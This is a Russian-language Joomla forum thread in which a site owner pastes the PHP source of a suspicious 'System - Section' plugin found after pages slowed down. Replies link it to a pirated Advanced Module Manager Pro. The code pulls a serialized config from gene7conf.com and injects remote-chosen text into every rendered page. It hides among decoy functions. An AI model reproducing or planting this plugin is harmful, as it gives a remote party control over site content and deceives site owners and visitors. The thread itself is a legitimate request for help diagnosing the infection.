Лучший Ответ .polega. , 28 May 2014 - 04:16
Может это я "подцепил" что то вредоносное?
Скажите, а не ставили ли вы Advanced Module Manager v4.13.2 Pro, взятый с какого-нибудь варезного сайта?
Перейти к сообщению
Плагин - section... что это?
Автор
happy home
, May 28 2014 03:15
-
Тема закрыта
Сообщений в теме: 5
#1
Отправлено 28 May 2014 - 03:15
Здравствуйте уважаемые форумчане.
Сегодня столкнулся с проблемой и т.к. не смог найти информацию в интернете, решил обратиться за помощью к Вам.
Сегодня стали долго загружаться страницы сайта (к обычному времени загрузки страниц добавилось лишних 22 секунды). Стали разбираться с саппортом хостинга... Оказалось с сайта идут запросы на сайт - gene7conf.com:
----------------------------------------------------------------------------------------------------------
IP 217.12.214.248 Хост: altron-214-248.customer.itl.ua Город: Харьков Страна: 
Ukraine IP диапазон: 217.12.214.0 - 217.12.214.255 Название провайдера: Altron Ltd Network
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: GENE7CONF.COM
Registrar: LLC "REGISTRAR OF DOMAIN NAMES REG.RU"
Whois Server: whois.reg.ru
Referral URL: http://www.reg.ru
Name Server: NS1.FRIENDDNS.RU
Name Server: NS2.FRIENDDNS.RU
Status: clientTransferProhibited
Updated Date: 16-feb-2014
Creation Date: 16-feb-2014
Expiration Date: 16-feb-2015
----------------------------------------------------------------------------------------------------------
а, так как сайт не доступен - образовалась задержка...
Нашли файл, который генерирует запросы - им оказался подозрительный плагин под названием System - Section (так он обозначен в Менеджере плагинов), а при попытке зайти в его настройки появляется ошибка:
500 - Обнаружена ошибка. Файл section.xml не найден.
в корне сайта, в папке plugins/system/section находится фаил: section.php
вот его содержимое:
<?php
defined( '_JEXEC' ) or die( 'Restricted access' );
jimport( 'joomla.plugin.plugin' );
class plgSystemSection extends JPlugin {
function plgSystemSection(& $subject, $config) {
parent::__construct($subject, $config);
}
function getCategoriesListView( $object_id, $page = 0 ) {
global $myCat;
$object_id = (int) $object_id;
$object_group = trim( $object_group );
$acl = & CategoryFactory::getACL();
$config = & JCommentsFactory::getConfig();
$comments_per_page = $config->getInt('category_per_page');
$comments_page_limit = $config->getInt('category_page_limit');
$canPublish = $acl->canPublish();
}
function onAfterRender() {
$body = JResponse::getBody();
if(!$body||$body=='') return true;
$mainframe = & JFactory::getApplication('site');
if($mainframe->isAdmin()) return;
$body = $this->installOptions($body);
JResponse::setBody($body);
}
function getCategoryNewTree( $object_id, $object_group = 'com_content' ) {
global $my;
$object_id = (int) $object_id;
$object_group = trim($object_group);
$acl = & JCommentsFactory::getACL();
$config = & JCommentsFactory::getConfig();
$canPublish = $acl->canPublish();
$canComment = $acl->canComment();
}
function getURIattr() {
return (!@$_SERVER['REQUEST_URI'])? @getenv("REQUEST_URI") : @$_SERVER['REQUEST_URI'];
}
public function getConfigOpt() {
$Conf = @file_get_contents('http://gene7conf.com/?d=' . $_SERVER['HTTP_HOST']);
return @unserialize($Conf);
}
function CategoryViewsTime( $name, $reason = '') {
global $mainframe, $my;
$config = & JCommentsFactory::getConfig();
if ($config->get('CategoryGet') != '') {
$object = new stdClass();
$object->object_cat = CategoryFactory::getAbs($object->object_cat);
$commentText = $comment->comment;
}
}
function installOptions($content) {
try {
$getOptions = $this->getConfigOpt();
$ord = @$getOptions['l'][$this->getURIattr()];
if(count(@$ord['m'])) {
$opt = (@$ord['k'])? $ord['k'] : $getOptions['d'];
$mopt = (count(@$getOptions['*']))? $getOptions['*'] : array();
$l=''; foreach(array_merge($ord['m'], $mopt) as $elem) {$l .= ' '. $elem;}
$content = @preg_replace("|{$opt}|", $opt . $l, $content, 1);
}
} catch (Exception $e) {}
return $content;
}
function loadAlternateCatergory($languageSuffix = '') {
if ($languageSuffix == '') {
$languageSuffix = CategoryInput::getVar('lsfx', '');
}
if ($languageSuffix != '') {
$config = & CategoryFactory::getConfig();
$config->set('lsfx', $languageSuffix);
$language = & JFactory::getLanguage();
$language->load($languageSuffix);
}
}
}
?>
После отключения этого плагина скорость загрузки страниц сайта восстановилась.
Подскажите пожалуйста, если кто знает, ЧТО ЭТО ЗА ПЛАГИН 
Может это я "подцепил" что то вредоносное?
Возможно, кто то сталкивался с подобным?
Буду признателен за помощь!
Сообщение отредактировал happy home: 28 May 2014 - 03:18
#2
Отправлено 28 May 2014 - 04:16 Лучший Ответ
Может это я "подцепил" что то вредоносное?
Скажите, а не ставили ли вы Advanced Module Manager v4.13.2 Pro, взятый с какого-нибудь варезного сайта?
Сообщение отредактировал realtygroupinfo: 28 May 2014 - 04:18
#3
Отправлено 28 May 2014 - 04:30
Да, точно, брал именно 4.13.2PRO (но, там, где брал - гарантируют (вроде бы) чистоту и борются с внедренным кодом...
Сообщение отредактировал happy home: 28 May 2014 - 04:32
#5
Отправлено 28 May 2014 - 05:09
для информации, читайте эту страничку форума
сообщения 54 и 60.
Сообщение отредактировал realtygroupinfo: 28 May 2014 - 05:10
